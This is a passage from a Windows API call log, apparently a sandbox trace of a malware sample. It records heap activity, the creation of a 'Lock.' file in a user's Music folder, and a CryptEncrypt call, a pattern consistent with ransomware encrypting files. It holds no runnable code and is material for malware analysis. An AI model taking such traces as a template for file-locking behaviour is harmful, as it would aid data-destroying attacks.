0x34aa3b8 [0253.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0253.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0253.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\VvGsoQYq1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\vvgsoqyq1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0253.693] GetLastError () returned 0x5 [0253.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0253.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.696] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0253.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0253.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0253.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.696] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0253.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music/Lock.VvGsoQYq1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\lock.vvgsoqyq1"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0253.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0253.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0253.697] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.697] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0253.698] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.698] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.698] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0253.698] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0253.698] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.698] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0253.699] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0253.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.699] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.699] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.700] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0253.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.700] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0253.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.700] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0253.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0253.701] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0253.701] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.701] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0253.701] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.701] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.701] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.701] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.701] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0253.702] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0253.702] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.702] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0253.702] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.702] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.703] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0253.703] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0253.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.703] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0253.703] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0253.703] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.704] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.704] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.704] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.704] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.704] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.704] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0253.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0253.705] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.705] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0253.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0253.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0253.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0253.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0253.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0253.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0253.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0253.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0253.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0253.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 